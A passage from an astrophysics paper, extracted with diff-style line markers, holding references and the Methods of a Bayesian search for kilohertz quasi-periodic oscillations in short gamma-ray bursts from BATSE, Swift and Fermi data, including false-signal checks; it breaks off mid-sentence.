+ tory. Classical and Quantum Gravity 27 (19),
505
+ 194002 (2010).
506
+ [16] Abbott, B. P. et al. Exploring the sensitivity
507
+ of next generation gravitational wave detec-
508
+ tors. Classical and Quantum Gravity 34 (4),
509
+ 044001 (2017).
510
+ [17] Ackley, K. et al.
511
+ Neutron Star Extreme
512
+ Matter
513
+ Observatory:
514
+ A
515
+ kilohertz-band
516
+ gravitational-wave detector in the global
517
+ network. Publ. Astron. Soc. Austr. 37, e047
518
+ (2020).
519
+ [18] Chirenti, C., Miller, M. C., Strohmayer, T. &
520
+ Camp, J. Searching for Hypermassive Neu-
521
+ tron Stars with Short Gamma-Ray Bursts.
522
+ Astrophys. J. Lett. 884 (1), L16 (2019).
523
+ [19] Metzger, B. D. Kilonovae. Living Reviews in
524
+ Relativity 23 (1), 1 (2019).
525
+ [20] M¨osta, P., Radice, D., Haas, R., Schnetter,
526
+ E. & Bernuzzi, S.
527
+ A Magnetar Engine for
528
+ Short GRBs and Kilonovae.
529
+ Astrophys. J.
530
+ Lett. 901 (2), L37 (2020).
531
+ [21] Fong, W. et al. The Broadband Counterpart
532
+ of the Short GRB 200522A at z = 0.5536: A
533
+ Luminous Kilonova or a Collimated Outflow
534
+ with a Reverse Shock? Astrophys. J. 906 (2),
535
+ 127 (2021).
536
+ [22] Meegan, C. et al.
537
+ The Fermi Gamma-ray
538
+ Burst Monitor. Astrophys. J. 702 (1), 791–
539
+ 804 (2009).
540
+ [23] Barthelmy, S. D. et al. The Burst Alert Tele-
541
+ scope (BAT) on the SWIFT Midex Mission.
542
+ Space Science Research 120 (3-4), 143–164
543
+ (2005).
544
+ [24] Preece, R. D. et al. The BATSE Gamma-Ray
545
+ Burst Spectral Catalog. I. High Time Reso-
546
+ lution Spectroscopy of Bright Bursts Using
547
+ High Energy Resolution Data. Astrophys. J.
548
+ Suppl. 126 (1), 19–36 (2000).
549
+ [25] Deng, M., & Schaefer, B. E.
550
+ Search for
551
+ Millisecond Periodic Pulsations in BATSE
552
+ Gamma-Ray Bursts. Astrophys. J. 491 (2),
553
+ 720–724 (1997).
554
+ [26] Kruger, A. T., Loredo, T. J. & Wasserman,
555
+ I. Search for High-Frequency Periodicities in
556
+ Time-tagged Event Data from Gamma-Ray
557
+ Bursts and Soft Gamma Repeaters. Astro-
558
+ phys. J. 576 (2), 932–941 (2002).
559
+ [27] Dichiara, S., Guidorzi, C., Frontera, F. &
560
+ Amati, L. A Search for Pulsations in Short
561
+ Gamma-Ray Bursts to Constrain their Pro-
562
+ genitors. Astrophys. J. 777 (2), 132 (2013).
563
+ [28] Sarin, N. & Lasky, P. D. The evolution of
564
+ binary neutron star post-merger remnants: a
565
+ review.
566
+ General Relativity and Gravitation
567
+ 53 (6), 59 (2021).
568
+ [29] Ray, P. S. et al. STROBE-X: X-ray Timing
569
+ and Spectroscopy on Dynamical Timescales
570
+ from Microseconds to Years. arXiv e-prints
571
+ arXiv:1903.03035 (2019).
572
+
573
+ Springer Nature 2021 LATEX template
574
+ 6
575
+ kHz QPOs in sGRBs
576
+ [30] Caputo, R. et al.
577
+ AMEGO-X Mission
578
+ Overview, Vol. 54 of AAS/High Energy Astro-
579
+ physics Division, 404.03 (2022).
580
+ [31] Miller, M. C., Chirenti, C. & Strohmayer,
581
+ T. E.
582
+ On the Persistence of QPOs during
583
+ the SGR 1806-20 Giant Flare. Astrophys. J.
584
+ 871 (1), 95 (2019).
585
+ [32] Groth, E. J. Probability distributions related
586
+ to power spectra.
587
+ Astrophys. J. Suppl. 29,
588
+ 285–302 (1975).
589
+ [33] Cline, D. B., Matthey, C. & Otwinowski,
590
+ S. Study of Very Short Gamma-Ray Bursts.
591
+ Astrophys. J. 527 (2), 827–834 (1999).
592
+ [34] Strohmayer, T. E. & Watts, A. L.
593
+ The
594
+ 2004 Hyperflare from SGR 1806-20: Further
595
+ Evidence for Global Torsional Vibrations.
596
+ Astrophys. J. 653 (1), 593–601 (2006).
597
+ [35] Roberts, O. J. et al. Rapid spectral variability
598
+ of a giant flare from a magnetar in NGC 253.
599
+ Nature 589 (7841), 207–210 (2021).
600
+ [36] Bauswein, A. & Stergioulas, N.
601
+ Unified
602
+ picture of the post-merger dynamics and
603
+ gravitational wave emission in neutron star
604
+ mergers.
605
+ Phys. Rev. D 91 (12), 124056
606
+ (2015).
607
+ [37] Paschalidis, V., East, W. E., Pretorius, F.
608
+ & Shapiro, S. L.
609
+ One-arm spiral instabil-
610
+ ity in hypermassive neutron stars formed by
611
+ dynamical-capture binary neutron star merg-
612
+ ers. Phys. Rev. D 92 (12), 121502 (2015).
613
+ [38] Kastaun, W. & Galeazzi, F.
614
+ Properties of
615
+ hypermassive neutron stars formed in merg-
616
+ ers of spinning binaries. Phys. Rev. D 91 (6),
617
+ 064027 (2015).
618
+ [39] Ciolfi, R. et al. General relativistic magneto-
619
+ hydrodynamic simulations of binary neutron
620
+ star mergers forming a long-lived neutron
621
+ star. Phys. Rev. D 95 (6), 063016 (2017).
622
+ [40] Lioutas, G., Bauswein, A. & Stergioulas, N.
623
+ Frequency deviations in universal relations of
624
+ isolated neutron stars and postmerger rem-
625
+ nants. Phys. Rev. D 104 (4), 043011 (2021).
626
+ [41] Dimmelmeier, H., Stergioulas, N. & Font,
627
+ J. A. Non-linear axisymmetric pulsations of
628
+ rotating relativistic stars in the conformal
629
+ flatness approximation. Mon. Not. R. Astron.
630
+ Soc. 368 (4), 1609 (2006).
631
+ [42] Nedora, V., Bernuzzi, S. Radice, D. Perego,
632
+ A. Endrizzi, A. & Ortiz, N. Spiral-wave Wind
633
+ for the Blue Kilonova.
634
+ Astrophys. J. Lett.
635
+ 886 (2), L30 (2019).
636
+ Methods
637
+ Other Bayesian searches for high-frequency
638
+ QPOs in GRBs.
639
+ Other searches have been
640
+ conducted, with null results, for high-frequency
641
+ variability in gamma-ray burst data [25–27]. For
642
+ example, an analysis of BATSE TTE data from 20
643
+ bright short and long bursts (not including either
644
+ of the two we feature here) found no significant
645
+ periodic signals in the frequency range 30 Hz to
646
+ 60,000 Hz [25]. Later analyses of BATSE TTE
647
+ data for periodic signals in the 400 − 2500 Hz
648
+ range using a Rayleigh test [26], and for oscil-
649
+ lations and narrow quasiperiodic oscillations of
650
+ up to 200 Hz using a Fourier-based method [27],
651
+ also found no significant signals (the approach
652
+ [43] in the latter study was also used to look for
653
+ lower-frequency QPOs in short magnetar bursts
654
+ and long GRBs [44–47]). In contrast, we search
655
+ for the broad quasi-periodicity expected from a
656
+ temporary, decaying oscillation.
657
+ Data selection.
658
+ In order to select bursts for
659
+ our analysis that could be bright enough to yield
660
+ detections or interesting limits on a QPO signal,
661
+ we use a flux threshold for the Swift/BAT and Fer-
662
+ mi/GBM bursts based on theoretical arguments
663
+ [18]. Using Fourier analysis [48], we can estimate
664
+ a flux threshold
665
+ F ≈ 2nσEpeak
666
+ Adeta2osc
667
+
668
+ ∆ν
669
+ ∆T ,
670
+ (1)
671
+ where nσ is the required significance of the QPO
672
+ (in standard deviations), Epeak is the peak energy
673
+ of the burst, Adet is the detector area, aosc is the
674
+ fractional root mean squared oscillation amplitude
675
+ in the count rate caused by the QPO, ∆T is the
676
+ total observation time and ∆ν is the width of the
677
+ QPO. We require nσ = 5 and fix a fiducial high
678
+ aosc = 0.75 to obtain a correspondingly low F,
679
+
680
+ Springer Nature 2021 LATEX template
681
+ kHz QPOs in sGRBs
682
+ 7
683
+ and assumed ∆ν = 250 Hz [18]. In contrast to
684
+ this selection for the Swift/BAT and Fermi/GBM
685
+ short bursts, we analyzed all of the 532 short
686
+ bursts from the BATSE sample. (Due to its larger
687
+ detector area, the BATSE flux threshold would be
688
+ up to several times lower than the threshold for
689
+ the other detectors.)
690
+ Swift/BAT data set.
691
+ In this analysis, we use
692
+ a sub-sample of 8 short GRBs (T90 < 5 s) and
693
+ 110 long GRBs (included here for improved statis-
694
+ tics) detected with Swift/BAT (before August 10,
695
+ 2020) with a 1-s peak flux in the 15-150 keV band
696
+ higher than 3.556 × 10−7 erg s−1 cm−2 based
697
+ on Equation 1. The 1-s peak fluxes are adopted
698
+ from the Swift BAT/GRB catalog [49]. The sam-
699
+ ple excludes two ground-detected GRBs that were
700
+ found during spacecraft slews, which could compli-
701
+ cate the analysis due to the continuously changing
702
+ instrumental response and sky coverage during the
703
+ slew time throughout the entire burst emission.
704
+ Our
705
+ QPO
706
+ study
707
+ utilizes
708
+ BAT
709
+ non-
710
+ maskweighted light curves in the 15-350 keV
711
+ range and uses the native 100 µs time resolution
712
+ for our intervals. We applied the standard HEA-
713
+ Soft tool, batbinevt (version 1.48), to create the
714
+ light curves. For each burst, we search for QPO
715
+ signals across the entire burst duration.
716
+ Fermi/GBM data set.
717
+ We selected a sub-
718
+ sample of 184 short GRBs (T90 < 5 s) detected
719
+ by Fermi-GBM from July 2008 to July 20,
720
+ 2018.
721
+ We
722
+ require
723
+ a
724
+ peak
725
+ flux
726
+ higher
727
+ than
728
+ 2.074×10−6 erg cm−2 s−1 based on Equation 1.
729
+ For each GRB we take the TTE files of the
730
+ two most illuminated NaI detectors and extract
731
+ the corresponding light curves in 100 µs intervals
732
+ (binned from the native 2 µs resolution) in the
733
+ 8–1000 keV band using the fselect and gtbin
734
+ tools. For our analysis we use the heasoft (ver-
735
+ sion 6.30.1) and the Fermitools (version 2.0.8)
736
+ software packages. We reject light curves affected
737
+ by spikes due to the interactions of high-energy
738
+ particles with the spacecraft [22] and use non-
739
+ background subtracted data. We process the data
740
+ by following the Fermi team threads [50].
741
+ CGRO/BATSE data set.
742
+ We analyze the
743
+ BATSE TTE data available for all 532 short
744
+ gamma-ray bursts [51], without a lower flux
745
+ threshold. In this mode, the time resolution is 2
746
+ µs and there are four energy channels: channel 1
747
+ has photon energies from 20 − 50 keV, channel 2
748
+ from 50 − 100 keV, channel 3 from 100 − 300 keV,
749
+ and channel 4 has energies > 300 keV [52]. The
750
+ TTE data contain 32,768 counts covering no more
751
+ than 2 s, with about one fourth of the counts in
752
+ the preburst interval, which contains data from all
753
+ 8 detectors. The remaining 3/4 of memory con-
754
+ tains data for burst-selected detectors (brightest
755
+ detectors at the trigger time).
756
+ Analysis Methods.
757
+ We search short GRBs for
758
+ QPOs that are reasonable matches to the expec-
759
+ tations for post-merger oscillations of HMNSs.
760
+ Because these oscillations are expected to have
761
+ frequencies in excess of ∼ 1000 Hz, we focus on
762
+ high frequencies: our analysis uses power density
763
+ spectra from 500 Hz to 5000 Hz. In addition,
764
+ because HMNS oscillations are expected to damp
765
+ on timescales ∼ 0.1 s [2, 3], we construct power
766
+ density spectra from data segments of approxi-
767
+ mately the same duration.
768
+ In practice, since we use a fast Fourier trans-
769
+ form (FFT), the segments we analyze are powers
770
+ of 2 times the time resolution of each instrument.
771
+ We therefore use segments of length 210 × 10−4 s,
772
+ or 0.1024 s, for the Swift BAT and Fermi GBM
773
+ data sets, which have Nyquist frequencies of 1/(2×
774
+ 100 µs) = 5000 Hz. For BATSE data sets we
775
+ analyze segments of length 216 × 2 × 10−6 s, or
776
+ 0.131072 s. The Nyquist frequency for these data is
777
+ 1/(2×2 µs), or 250, 000 Hz, but at least in our two
778
+ featured bursts we did not see any excess power
779
+ beyond 5000 Hz.
780
+ In order to avoid missing signals that overlap
781
+ the end of one segment and the beginning of the
782
+ next, our segments have half-overlap. For exam-
783
+ ple, if a Swift burst lasts for two seconds, our
784
+ first segment is from 0 to 0.1024 s, our second is
785
+ from 0.0512 to 0.1536 s, our third is from 0.1024
786
+ to 0.2048 s, and so on. We have not attempted
787
+ to optimize the segments further; for example, if
788
+ there was an apparent signal from 0.0512 to 0.1536
789
+ s in a given data set, we did not explore slightly
790
+ offset intervals of the same duration.
791
+ When we search for QPOs we compute Bayes
792
+ factors between specified models. In the high fre-
793
+ quency range that we explore, we typically do not
794
+ expect (nor do we typically find) that there is
795
+ significant red noise (see the “Additional analysis
796
+ with adjustable red noise” section below for red-
797
+ noise analysis of our two signals, which finds no
798
+
799
+ Springer Nature 2021 LATEX template
800
+ 8
801
+ kHz QPOs in sGRBs
802
+ significant difference in the significance or inferred
803
+ parameters when we use red instead of white
804
+ noise). However, very short-duration pulses such
805
+ as those that could be produced by a cosmic ray
806
+ will generate noise that is close to white because
807
+ the Fourier transform of a delta function is a con-
808
+ stant with frequency. As a result, our no-QPO
809
+ model is that, in addition to the unavoidable Pois-
810
+ son fluctuations, there can be additional white
811
+ noise.
812
+ For our QPO model we use a Lorentzian form
813
+ for the power density P(ν), which we add to white
814
+ noise. Therefore, in a model with n QPOs the
815
+ power as a function of frequency ν is
816
+ P(ν) = Awhite +
817
+ n
818
+
819
+ i=1
820
+ Ai
821
+ 1 + (ν − νi)2/(∆νi)2 .
822
+ (2)
823
+ Thus a model with only white noise has 1 param-
824
+ eter; a model with white noise plus one QPO
825
+ has four parameters; a model with white noise
826
+ plus two QPOs has seven parameters; and so
827
+ on. For QPO i, Ai is the power density of the
828
+ Lorentzian at its center, νi is the central frequency
829
+ of the Lorentzian, and ∆νi is the half-width of
830
+ the Lorentzian. We adopt this form because it is
831
+ the Fourier transform of a signal described by an
832
+ exponentially damped sinusoid, which is roughly
833
+ consistent with the expectations for a decaying
834
+ HMNS oscillation. Each QPO is represented by
835
+ a different Lorentzian, and if the frequencies of
836
+ multiple QPOs are close enough relative to their
837
+ widths, they can overlap. In our QPO models we
838
+ also allow there to be additional white noise.
839
+ Details about our approach have been pub-
840
+ lished earlier [31]. In brief, the likelihood L(P; Ps)
841
+ that a power density P will be observed in a given
842
+ frequency bin, given an expected model power Ps,
843
+ is [32]:
844
+ L(P; Ps) = e−(P +Ps)
845
+
846
+
847
+ m=0
848
+ P mP m
849
+ s
850
+ (m!)2 .
851
+ (3)
852
+ Here the normalization is such that if the signal
853
+ is intrinsically constant and thus the only power
854
+ comes from Poisson fluctuations (i.e., Ps = 0), the
855
+ mean power is ⟨P⟩ = 1. Note that this differs by a
856
+ factor of two from the commonly-used Leahy nor-
857
+ malization [53], for which ⟨P⟩ = 2 for pure Poisson
858
+ noise. For a given power density spectrum and a
859
+ given model (involving 0, 1, or 2 QPOs), we com-
860
+ pute the log of the likelihood of the data set given
861
+ the model by summing the log likelihoods over all
862
+ of the power densities from 500 Hz to 5000 Hz.
863
+ For each model type (0, 1, or 2 QPOs) we
864
+ compute the maximum log likelihood over all
865
+ parameter combinations using a custom affine-
866
+ invariant Markov chain Monte Carlo (MCMC)
867
+ code based on the approach of Goodman and
868
+ Weare [54]. In our particular implementation of
869
+ the MCMC code we use 32 walkers for the white
870
+ noise only and the white noise + 1 QPO runs, and
871
+ 56 walkers for the white noise + 2 QPOs runs. We
872
+ start each run from a tight bundle of walkers near
873
+ a random point in parameter space, and perform
874
+ each run 20 times from different random starting
875
+ locations. We find that similar values for the best
876
+ fit are repeatedly attained in these 20 runs for a
877
+ given data set, which suggests that the likelihood
878
+ surfaces are relatively smooth.
879
+ To compute Bayes factors we need first to com-
880
+ pute the evidence E for each model by integrating
881
+ the product of the likelihood L(⃗a) with the prior
882
+ q(⃗a) over all combinations of the parameters ⃗a in
883
+ a given model:
884
+ E =
885
+
886
+ L(⃗a)q(⃗a)d⃗a ,
887
+ (4)
888
+ where the prior has been normalized such that
889
+
890
+ q(⃗a)d⃗a = 1. We calculate E using Monte Carlo
891
+ integration, with a target precision of 10% of the
892
+ best estimate. The Bayes factor between models
893
+ A and B is then BA
894
+ B = EA/EB. We assume that
895
+ the 0-, 1-, and 2-QPO models all have the same
896
+ prior probability, which means that the odds ratio
897
+ between them equals the Bayes factor: OA
898
+ B = BA
899
+ B.
900
+ Based on our experience with the data, we use
901
+ the following priors:
902
+ 1. For the white noise, Awhite is flat between 0 and
903
+ 5.
904
+ 2. For the QPOs, Ai is flat between 0 and 30.
905
+ 3. For the higher-frequency QPO, log10 ν2(Hz)
906
+ is flat between 3.0 and 3.7. For the lower-
907
+ frequency QPO, log10 ν1(Hz) is flat between 2.7
908
+ and 3.7. For a 1-QPO model we use only the
909
+ ν2 prior.
910
+ 4. log10 ∆νi(Hz) is flat between 1.0 and 3.0.
911
+ We adopt priors for the centroid frequency and
912
+ width of the QPOs that are flat in log frequency
913
+
914
+ Springer Nature 2021 LATEX template
915
+ kHz QPOs in sGRBs
916
+ 9
917
+ because we wish to be agnostic about the scale;
918
+ in contrast, for example, a prior that is flat in fre-
919
+ quency width between 10 Hz and 1000 Hz would
920
+ have most of its weight at large widths. However,
921
+ the strength of the QPO signal in our two fea-
922
+ tured bursts is great enough that the prior has
923
+ little effect.
924
+ Potential causes of false QPO signals.
925
+ Our
926
+ initial analysis, which began with the Swift/-
927
+ BAT data, revealed some possible causes of false
928
+ QPO signals. The first is spikes of ∼ 10 − 100
929
+ counts within a single readout time interval of
930
+ 100 µs. These are presumably produced by cos-
931
+ mic rays rather than gamma rays from a burst.
932
+ As discussed above, because an unresolved spike
933
+ approximates a delta function, the power den-
934
+ sity from a single spike is essentially white noise.
935
+ If there are two or more such spikes in a given
936
+ data set then the frequencies corresponding to the
937
+ reciprocals of the intervals between the spikes also
938
+ show up prominently in the power density spec-
939
+ trum, and these can be read incorrectly as QPOs.
940
+ Our approach was to discard segments of Swift/-
941
+ BAT data in which any 100 µs interval had more
942
+ than 8 counts, because such a high number is
943
+ almost certainly from a cosmic ray (see the orange
944
+ distribution in Extended Data Figure 1).
945
+ Another false signal, which occurred in the
946
+ Swift/BAT data for the long burst GRB 191004B,
947
+ was caused by 1000-Hz pulses sent to BAT to aid
948
+ in its calibration (D. Palmer, private communica-
949
+ tion; see the gray distribution in Extended Data
950
+ Figure 1).
951
+ A third type of false signal can come from
952
+ extraction of the data sets themselves. Kruger et
953
+ al. [26] found in their search a few cases (they
954
+ highlight BATSE trigger 2101) in which there
955
+ appeared to be significant power. However, they
956
+ discovered that in these cases the apparent signals
957
+ were found in portions of the ASCII TTE data
958
+ with an abnormally low count rate, which was not
959
+ consistent with the original FITS data, and con-
960
+ cluded that there had been corruption of the data
961
+ sets when they were translated to ASCII. Neither
962
+ of our featured bursts have data corrupted in this
963
+ way.
964
+ A fourth potential warning sign is the presence
965
+ of large amounts of red noise up to hundreds of
966
+ Hertz. As indicated above we focus on frequencies
967
+ above 500 Hz in large part to avoid the red noise
968
+ 0.1
969
+ 1
970
+ 10
971
+ 100
972
+ 1000
973
+ 10000
974
+ 100000
975
+ -2
976
+ 0
977
+ 2
978
+ 4
979
+ 6
980
+ 8
981
+ 10
982
+ # segments
983
+ log10(B1
984
+ 0)
985
+ all LGRBs
986
+ LGRBs without spikes
987
+ all sGRBs
988
+ sGRBs without spikes
989
+ Swift/BAT
990
+ Extended Data Fig.
991
+ 1 | Differential distribution
992
+ of Bayes factors for Swift/BAT bursts. We plot sep-
993
+ arately the sample of 8 short bursts (orange) and 110 long
994
+ bursts (gray). The light orange and light gray distributions
995
+ include the analysis of segments with spikes in the light
996
+ curve caused by cosmic ray contamination. The only case of
997
+ a short GRB with B1
998
+ 0 > 1 is GRB 171011A, with B1
999
+ 0 ≈ 180.
1000
+ The moderate Bayes factor in this case was caused by a
1001
+ signal that was identified with the interval between two
1002
+ spikes caused by cosmic rays. By limiting the maximum
1003
+ number of counts in one 100 µs bin to 8, we remove most
1004
+ of the contamination by cosmic rays from both short and
1005
+ long bursts (including 16 additional long burst outliers with
1006
+ log10 B1
1007
+ 0 > 10, not shown). After the removal of the cosmic
1008
+ ray contamination, the single long GRB outlier (dark gray)
1009
+ with Bayes factor ∼ 6000 is GRB 191004B; the signal was
1010
+ caused by 1000 Hz calibration pulses on the BAT detectors
1011
+ at nearly 300 s after the trigger, when Swift was slewing.
1012
+ which complicates our analysis. But in a small
1013
+ number of cases the red noise is prominent even
1014
+ above 500 Hz (see panels a and b of Extended
1015
+ Data Figure 2 for an example). This makes it con-
1016
+ siderably more difficult to interpret excesses in the
1017
+ power density spectrum because, for example, it
1018
+ is not clear that the red noise should be a power
1019
+ law with a single slope. A signature of red noise
1020
+ in our analysis, particularly of the BATSE data,
1021
+ is that the centroid frequency of a one-QPO fit is
1022
+ driven to the lowest allowed value, i.e., 1000 Hz.
1023
+ We use this signature to identify data segments
1024
+ with excess red noise. It is unclear what causes the
1025
+ large red noise in some of the BATSE bursts, but
1026
+ to avoid contamination we exclude these from our
1027
+ sample; see the bottom panel of Extended Data
1028
+ Figure 2.
1029
+ Finally, a fifth potential cause for overestimat-
1030
+ ing the significance of a QPO has been discussed
1031
+ recently [55]. The basic effect is that if the total
1032
+ counts in a data segment are dominated by a small
1033
+ fraction of the segment, then a Fourier analysis
1034
+ of the whole segment effectively overresolves the
1035
+
1036
+ Springer Nature 2021 LATEX template
1037
+ 10
1038
+ kHz QPOs in sGRBs
1039
+ 0
1040
+ 10
1041
+ 20
1042
+ 30
1043
+ 40
1044
+ 50
1045
+ 0
1046
+ 25
1047
+ 50
1048
+ 75
1049
+ 100
1050
+ 125
1051
+ a
1052
+ # counts
1053
+ time (ms)
1054
+ 0
1055
+ 10
1056
+ 20
1057
+ 30
1058
+ 40
1059
+ 1000
1060
+ 2000
1061
+ 3000
1062
+ 4000
1063
+ 5000
1064
+ b
1065
+ power
1066
+ frequency (Hz)
1067
+ best fit (white noise + 1QPO)
1068
+ 0.1
1069
+ 1
1070
+ 10
1071
+ 100
1072
+ 1000
1073
+ 10000
1074
+ -2
1075
+ 0
1076
+ 2
1077
+ 4
1078
+ 6
1079
+ 8
1080
+ 10
1081
+ c
1082
+ GRB
1083
+ 910711
1084
+ GRB
1085
+ 931101B
1086
+ # segments
1087
+ log10(B1
1088
+ 0)
1089
+ including red noise excess
1090
+ CGRO/BATSE (high energy)
1091
+ Extended Data Fig.
1092
+ 2 | Analysis of BATSE seg-
1093
+ ments contaminated by excess red noise. a, Light
1094
+ curve of a segment near the middle of the ∼ 1 second
1095
+ long burst GRB 980310B. b, Power spectrum of that seg-
1096
+ ment, which shows clear red noise above 500 Hz, and the
1097
+ best fit according to our algorithm. The resulting Bayes
1098
+ factor for one QPO versus none is B1
1099
+ 0 ≈ 10214. c, The
1100
+ differential distribution of log10 B1
1101
+ 0 (defined in the main
1102
+ text) for the entire set of BATSE short GRBs (there are
1103
+ 4 additional outliers with large amounts of red noise and
1104
+ log10 B1
1105
+ 0 > 9, including the one featured in panels a and b),
1106
+ and for the subset obtained after removing data segments
1107
+ contaminated with red noise above 500 Hz.
1108
+ power spectrum of the small contributing frac-
1109
+ tion. As a result, contrary to the assumptions of
1110
+ such analyses, the power is correlated between fre-
1111
+ quencies and false positive QPOs can appear. See
1112
+ Extended Data Figure 3 for a discussion of one
1113
+ such case in the BATSE data we analyzed, proba-
1114
+ bly caused by chance by the position of the edges
1115
+ of the data segment relative to the light curve of
1116
+ GRB 930110.
1117
+ We combed the data for similar segments
1118
+ which included only the several milliseconds at the
1119
+ beginning or end of a burst, and removed all such
1120
+ segments from our sample. None of those segments
1121
+ were as extreme as the first GRB 930110 segment,
1122
+ and indeed none of them had B1
1123
+ 0 > 0.4, but by
1124
+ removing them from the sample we decrease the
1125
+ probability of a false positive.
1126
+ 0
1127
+ 20
1128
+ 40
1129
+ 60
1130
+ 0
1131
+ 100
1132
+ 200
1133
+ 300
1134
+ 400
1135
+ 500
1136
+ a
1137
+ counts
1138
+ time (ms)
1139
+ GRB930110
1140
+ 0
1141
+ 4
1142
+ 8
1143
+ 1000
1144
+ 2000
1145
+ 3000
1146
+ 4000
1147
+ 5000
1148
+ b
1149
+ power
1150
+ frequency (Hz)
1151
+ GRB930110
1152
+ 10-3
1153
+ 10-2
1154
+ 10-1
1155
+ 100
1156
+ -4
1157
+ 0
1158
+ 4
1159
+ 8
1160
+ 12
1161
+ c
1162
+ p = 2 x 10-2
1163
+ (GRB930110)
1164
+ GRB930110-like
1165
+ synthetic sample
1166
+ probability distribution
1167
+ log10(B1
1168
+ 0)
1169
+ Extended Data Fig.
1170
+ 3 | Example of a proba-
1171
+ bly false signal of a QPO. a, BATSE data from
1172
+ GRB 930110, where the segment showing the apparent sig-
1173
+ nal is framed by the two vertical dotted lines. Although
1174
+ GRB 930110 has T90 = 220 ms [56], this segment is effec-
1175
+ tively an artificially very short GRB with T90 ∼ 10 ms.
1176
+ b, Power spectrum for this segment and the best one-
1177
+ QPO plus white noise fit, along with the 1σ, 2σ, and 3σ
1178
+ power levels in the white noise only fit (cf. Figure 3). c,
1179
+ Probability distribution of log10 B1
1180
+ 0 generated with 1,500
1181
+ realizations of light curves (without QPOs) fitted to the
1182
+ data segment shown in the top panel. The vertical dotted
1183
+ line in the bottom panel shows the value of log10(B1
1184
+ 0) seen
1185
+ in the BATSE data for this segment of GRB 930110, the
1186
+ diagonal dashed line shows an exponential fit to the top
1187
+ 3% of the Bayes factors, and the inset number shows the
1188
+ estimated false positive probability from the exponential
1189
+ fit. See the “Generating synthetic data” and “Estimates
1190
+ of significance of signals” sections below for more details.
1191
+ Based on the high probability of a false positive (note also
1192
+ that in this case the next half-overlapping data segment
1193
+ has B1
1194
+ 0 = 0.02), we remove this segment from our sample.
1195
+ 12 other segments that presented similarly cropped light
1196
+ curves were also removed from our sample for consistency,
1197
+ although all cases had unremarkable Bayes factors.
1198
+ Test of goodness of fit for the QPOs.
1199
+ As a
1200
+ crude test of goodness of fit, we can compute χ2
1201
+ for just the frequencies of the QPO, in the range
1202
+ of the centroid plus or minus twice the width of
1203
+ the QPO, as suggested by H¨ubner et al. [55]. The
1204
+ point is that when there are many frequencies in
1205
+ the power spectrum and only a small fraction of
1206
+ them are near a putative QPO, the overall χ2 can
1207
+ appear to be good even if the model is actually
1208
+
1209
+ Springer Nature 2021 LATEX template
1210
+ kHz QPOs in sGRBs
1211
+ 11
1212
+ poor (or unreasonably good, as can happen if the
1213
+ power spectrum is oversampled) for the QPOs,
1214
+ because at most frequencies there is no excess
1215
+ power and the fit is acceptable. To carry out this
1216
+ calculation we again use the Groth distributions
1217
+ [32], for which, given an expected (non-Poisson)
1218
+ power of Ps in a single frequency bin, the mean
1219
+ power after including Poisson noise is ⟨P⟩ = 1+Ps
1220
+ and the variance is ⟨P 2 − ⟨P⟩2⟩ = 1 + 2Ps.
1221
+ Although the predicted power distribution is not
1222
+ Gaussian and thus a χ2 description is not strictly
1223
+ valid, this gives a rough indication of the goodness
1224
+ of fit.
1225
+ Using this description, and including the
1226
+ three parameters per QPO when computing the
1227
+ number of degrees of freedom, we find that
1228
+ for the lower-frequency QPO in GRB 910711,
1229
+ χ2/dof = 9.1/11; for the higher-frequency QPO
1230
+ in GRB 910711, χ2/dof = 11.6/12; and the QPOs
1231
+ in GRB 931101B are too narrow, and thus have
1232
+ too small a number of degrees of freedom, for this
1233
+ to be a meaningful test. As expected from good
1234
+ fits, both χ2 values are close to their respective
1235
+ numbers of degrees of freedom.
1236
+ Distributions of ∆ ln L2
1237
+ 0.
1238
+ From now on we
1239
+ focus only on the BATSE data, where our sig-
1240
+ nals were detected. Because of the extra parameter
1241
+ volume required for a model with two Lorentzian
1242
+ QPOs plus white noise compared with a model
1243
+ that has zero or one QPO, it is not computa-
1244
+ tionally feasible to calculate B2
1245
+ 0 for every segment
1246
+ of BATSE data (there are approximately 14,200
1247
+ half-overlapping data segments in our analysis of
1248
+ 532 BATSE short bursts). We can, however, get
1249
+ a sense for the evidence for two QPOs by looking
1250
+ at the distribution of ∆ ln L2
1251
+ 0 , i.e. the difference
1252
+ between the maximum log likelihoods in a two-
1253
+ QPO model, and the maximum log likelihood in a
1254
+ white noise only model; this will be our figure of
1255
+ merit in the Section “Estimates of significance of
1256
+ signals” below. (The calculation of the significance
1257
+ using the difference between maximum log likeli-
1258
+ hoods is less robust than using the Bayes factor,
1259
+ as it does not take into account the structure of
1260
+ the likelihood surface. However, a test comparing
1261
+ ∆ ln L1
1262
+ 0 and B1
1263
+ 0 shows that they give very similar
1264
+ results.) In Extended Data Figure 4 we show the
1265
+ probability distribution of ∆ ln L2
1266
+ 0 inferred for the
1267
+ BATSE sample and compare it with a distribution
1268
+ obtained from synthetic realizations of Poisson
1269
+ noise. The bulk of the BATSE distribution is well
1270
+ represented by the Poisson noise distribution.
1271
+ 10-5
1272
+ 10-4
1273
+ 10-3
1274
+ 10-2
1275
+ 10-1
1276
+ 100
1277
+ 0
1278
+ 10
1279
+ 20
1280
+ 30
1281
+ 40
1282
+ 50
1283
+ 60
1284
+ GRB
1285
+ 910711
1286
+ GRB
1287
+ 931101B
1288
+ probability distribution
1289
+ ∆ ln L2
1290
+ 0
1291
+ CGRO/BATSE (high energy)
1292
+ Poisson noise
1293
+ Extended Data Fig.
1294
+ 4 | Probability distribution
1295
+ of signal strengths Here we show the distribution of
1296
+ ∆ ln L2
1297
+ 0 for the BATSE sample of short GRBs analyzed
1298
+ in our work, compared with the probability distribution
1299
+ obtained for 15,000 synthetic spectra generated containing
1300
+ independent realizations of Poisson noise. The two outliers
1301
+ are our signals, with ∆ ln L2
1302
+ 0 = 56.4 (GRB 910711) and 33.3
1303
+ (GRB 931101B). A third outlier with lower significance can
1304
+ also be seen at ∆ ln L2
1305
+ 0 = 21.3. The bulk of the BATSE
1306
+ distribution (excluding the outliers) is well represented by
1307
+ the Poisson noise distribution.
1308
+ Generating synthetic data.
1309
+ When a data
1310
+ stream is not stationary, as it is not in our case
1311
+ because the bursts present rapidly-changing flux,
1312
+ then power density spectra constructed using fast
1313
+ Fourier transforms can lead to overestimates of the
1314
+ significance of QPOs [55]. To assess the impact
1315
+ of this concern in our case, we generate syn-
1316
+ thetic data with the procedure described below,
1317
+ following H¨ubner et al. [55]:
1318
+ 1. We model (without QPOs) the light curve of
1319
+ each data segment in which we find candi-
1320
+ date signals. The signal model we use for the
1321
+ count rate as a function of time is related to a
1322
+ hyperbolic tangent and has six parameters as a
1323
+ function of the time t:
1324
